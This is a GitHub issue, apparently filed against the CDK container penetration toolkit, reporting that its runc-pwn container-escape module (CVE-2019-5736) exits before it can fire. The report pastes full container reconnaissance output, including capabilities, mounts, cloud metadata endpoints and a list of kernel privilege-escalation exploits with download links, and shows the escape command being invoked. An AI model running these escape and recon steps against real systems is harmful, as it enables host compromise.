exploit模块下runc-pwn直接退出 #79
Description
问题描述
执行runc-pwn模块,报出cannot find RunC process inside container, exit.之后,直接退出,没发生任何事就Finished。
在87行的if判断中直接return退出了函数,导致宿主机还没来得及执行exec命令,目标容器就已经退出了pid的监听。一开始宿主机创建容器时runc执行完就退出了,无法获取runc的pid。
CDK/pkg/exploit/docker_runc.go
Lines 87 to 90 in b0ca845
附加信息(Additional Information)
1、执行 cdk evaluate --full 的返回结果
$ ./cdk evaluate --full
CDK (Container DucK)
CDK Version(GitCommit):
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/
[ Information Gathering - System Info ]
2023/03/12 02:16:25 current dir: /
2023/03/12 02:16:25 current user: root uid: 0 gid: 0 home: /root
2023/03/12 02:16:25 hostname: 807f6b85cc1e
2023/03/12 02:16:25 debian ubuntu 18.04 kernel: 4.4.0-210-generic
2023/03/12 02:16:25 Setuid files found:
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/bin/mount
/bin/su
/bin/umount
[ Information Gathering - Services ]
[ Information Gathering - Commands and Capabilities ]
2023/03/12 02:16:25 available commands:
find,ps,apt,dpkg,mount,fdisk,base64,perl
2023/03/12 02:16:25 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
CapInh: 00000000a80425fb
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
Cap decode: 0x00000000a80425fb = CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_MKNOD,CAP_AUDIT_WRITE,CAP_SETFCAP
[*] Maybe you can exploit the Capabilities below:
[ Information Gathering - Mounts ]
0:41 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/YCLLF3QMOQWI6RXE5WOEML3MWH:/var/lib/docker/overlay2/l/T75S3NZRBNEIAZ6L3SOODUELSG:/var/lib/docker/overlay2/l/TQUPTPF5JE77BTN7SPW3C4EZ2C:/var/lib/docker/overlay2/l/HXM2EF5BE7N4OJVLYPMFSUAT2X,upperdir=/var/lib/docker/overlay2/c1946e06500cb5afce2ebe698b81e2996dbb67c3b38e23fa225aeb8e3a457cf7/diff,workdir=/var/lib/docker/overlay2/c1946e06500cb5afce2ebe698b81e2996dbb67c3b38e23fa225aeb8e3a457cf7/work
0:44 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:45 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:46 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:47 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:48 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - tmpfs tmpfs rw,mode=755
0:23 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/systemd ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd
0:25 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/freezer ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,freezer
0:26 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/devices ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,devices
0:27 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/blkio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,blkio
0:28 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/net_cls,net_prio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,net_cls,net_prio
0:29 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/cpu,cpuacct ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpu,cpuacct
0:30 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/hugetlb ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,hugetlb
0:31 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/perf_event ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,perf_event
0:32 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/cpuset ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuset
0:33 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/memory ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,memory
0:34 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/pids ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,pids
0:43 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
253:1 /var/lib/docker/containers/807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/vda1 rw,data=ordered
253:1 /var/lib/docker/containers/807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83/hostname /etc/hostname rw,relatime - ext4 /dev/vda1 rw,data=ordered
253:1 /var/lib/docker/containers/807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83/hosts /etc/hosts rw,relatime - ext4 /dev/vda1 rw,data=ordered
0:42 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k
0:46 /0 /dev/console rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:44 /bus /proc/bus ro,relatime - proc proc rw
0:44 /fs /proc/fs ro,relatime - proc proc rw
0:44 /irq /proc/irq ro,relatime - proc proc rw
0:44 /sys /proc/sys ro,relatime - proc proc rw
0:44 /sysrq-trigger /proc/sysrq-trigger ro,relatime - proc proc rw
0:45 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:45 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:45 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:45 /null /proc/sched_debug rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:49 / /proc/scsi ro,relatime - tmpfs tmpfs ro
0:50 / /sys/firmware ro,relatime - tmpfs tmpfs ro
[ Information Gathering - Net Namespace ]
container net namespace isolated.
[ Information Gathering - Sysctl Variables ]
2023/03/12 02:16:25 net.ipv4.conf.all.route_localnet = 0
[ Information Gathering - DNS-Based Service Discovery ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 223.5.5.5:53: no such host
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 223.5.5.5:53: no such host
[ Discovery - K8s API Server ]
2023/03/12 02:16:25 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
api-server forbids anonymous request.
response:
[ Discovery - K8s Service Account ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
[ Discovery - Cloud Provider Metadata API ]
2023/03/12 02:16:25 failed to dial Alibaba Cloud API.
2023/03/12 02:16:26 failed to dial Azure API.
2023/03/12 02:16:26 failed to dial Google Cloud API.
2023/03/12 02:16:26 failed to dial Tencent Cloud API.
OpenStack Metadata API available in http://169.254.169.254/openstack/latest/meta_data.json
Docs: https://docs.openstack.org/nova/rocky/user/metadata-service.html
Amazon Web Services (AWS) Metadata API available in http://169.254.169.254/latest/meta-data/
Docs: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html
2023/03/12 02:16:27 failed to dial ucloud API.
[ Exploit Pre - Kernel Exploits ]
2023/03/12 02:16:27 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2021-27365] linux-iscsi
Details: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
Exposure: less probable
Tags: RHEL=8
Download URL: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-15666] XFRM_UAF
Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
Exposure: less probable
Download URL:
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[+] [CVE-2017-7308] af_packet
Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
Exposure: less probable
Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000253] PIE_stack_corruption
Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
Exposure: less probable
Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
[+] [CVE-2017-1000112] NETIF_F_UFO
Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
Exposure: less probable
Tags: ubuntu=14.04{kernel:4.4.0-*},ubuntu=16.04{kernel:4.8.0-*}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE
Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
Exposure: less probable
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only
[+] [CVE-2016-8655] chocobo_root
Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
Download URL: https://www.exploit-db.com/download/40871
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
[+] [CVE-2016-4997] target_offset
Details: https://www.exploit-db.com/exploits/40049/
Exposure: less probable
Tags: ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40053.zip
Comments: ip_tables.ko needs to be loaded
[+] [CVE-2016-4557] double-fdput()
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
Exposure: less probable
Tags: ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016-2384] usb-midi
Details: https://xairy.github.io/blog/2016/cve-2016-2384
Exposure: less probable
Tags: ubuntu=14.04,fedora=22
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2016-0728] keyring
Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/40003
Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
[ Information Gathering - Sensitive Files ]
.dockerenv - /.dockerenv
/.bashrc - /etc/skel/.bashrc
/.bashrc - /root/.bashrc
[ Information Gathering - ASLR ]
2023/03/12 02:16:29 /proc/sys/kernel/randomize_va_space file content: 2
2023/03/12 02:16:29 ASLR is enabled.
[ Information Gathering - Cgroups ]
2023/03/12 02:16:29 /proc/1/cgroup file content:
11:pids:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
10:memory:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
9:cpuset:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
8:perf_event:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
7:hugetlb:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
6:cpu,cpuacct:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
5:net_cls,net_prio:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
4:blkio:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
3:devices:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
2:freezer:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
1:name=systemd:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
2023/03/12 02:16:29 /proc/self/cgroup file added content (compare pid 1) :
2、完整错误信息
root@807f6b85cc1e:/# ./cdk run runc-pwn "echo 'hello,host' > /tmp/haha.escape"
2023/03/12 02:15:28 THIS EXPLOIT WILL OVERWRITE RUNC BINARY AND BREAK CI/CD, BACKUP YOUR RUNC BINARY FIRST!
2023/03/12 02:15:28 Shellcode will be trigger when an execve() call in container or the container is manually stopped.
2023/03/12 02:15:28 Exploit CVE-2019-5736 with shellcode commands: echo 'hello,host' > /tmp/haha.escape
[0xc0001ccb60 0xc0001ccc30 0xc0001c81a0 0xc0001c9ba0 0xc00008dc70 0xc0001c8f70 0xc0001c9040 0xc0001c9790 0xc0001c9110 0xc0001c8a90 0xc0001c91e0 0xc0001c9c70 0xc00008dd40 0xc0001c8b60 0xc0001cc340 0xc00008dad0 0xc0001cc410 0xc00008dba0 0xc0001c9ee0 0xc0001c8750 0xc0001c92b0 0xc00008de10 0xc0001c9860 0xc0001c8820 0xc0001c9d40 0xc0001c8270 0xc0001c8340 0xc0001cc4e0 0xc0001cc000 0xc0001cc0d0 0xc0001c9380 0xc0001c88f0 0xc0001c8c30 0xc0001c9450 0xc0001c8410 0xc0001c9520 0xc0001c8d00 0xc0001c84e0 0xc00008dee0 0xc0001cc750 0xc0001cc1a0 0xc0001cc5b0 0xc0001c9e10 0xc0001c85b0 0xc0001cc9c0 0xc0001c9930 0xc0001c9a00 0xc0001c8680 0xc0001c89c0 0xc0001c8000 0xc0001cc820 0xc0001c95f0 0xc0001cca90 0xc0001cc270 0xc0001c80d0 0xc0001c8dd0 0xc0001c96c0 0xc0001cc8f0 0xc0001cc680 0xc0001c8ea0 0xc0001c9ad0]
/bin/bash
./cdkrunrunc-pwnecho 'hello,host' > /tmp/haha.escape
cannot find RunC process inside container, exit.
2023/03/12 02:15:28 Finished.